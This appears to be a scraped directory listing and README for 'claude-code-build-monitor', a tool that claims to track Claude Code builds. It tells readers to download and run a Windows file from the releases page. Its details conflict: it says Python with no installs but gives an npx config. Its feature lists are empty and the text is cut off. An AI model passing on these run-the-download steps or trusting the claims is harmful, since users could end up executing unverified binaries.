sibbybusinesslike991/claude-code-build-monitor
Track build commands in Claude Code with real-time progress bars, TUI status, sound alerts, and SQLite build history
Platform-specific configuration:
{
"mcpServers": {
"claude-code-build-monitor": {
"command": "npx",
"args": [
"-y",
"claude-code-build-monitor"
]
}
}
}Add the config above to .claude/settings.json under the mcpServers key.
[](https://github.com/sibbybusinesslike991/claude-code-build-monitor/releases)
Visit this page to download: https://github.com/sibbybusinesslike991/claude-code-build-monitor/releases
On the releases page, look for the latest Windows file. Download it, then run the file on your PC.
claude-code-build-monitor shows build progress in a simple text screen while your tools run. It helps you see what is happening without reading long command output.
It can detect common build tools such as:
It can show:
You need:
This app is built in Python and ships with no extra package installs for end users.
If you prefer, you can start it from a command window:
After you start the app, run your build command in Claude Code as usual.
The monitor watches the command output and tries to detect what kind of tool is running. It then shows a progr
Loading reviews...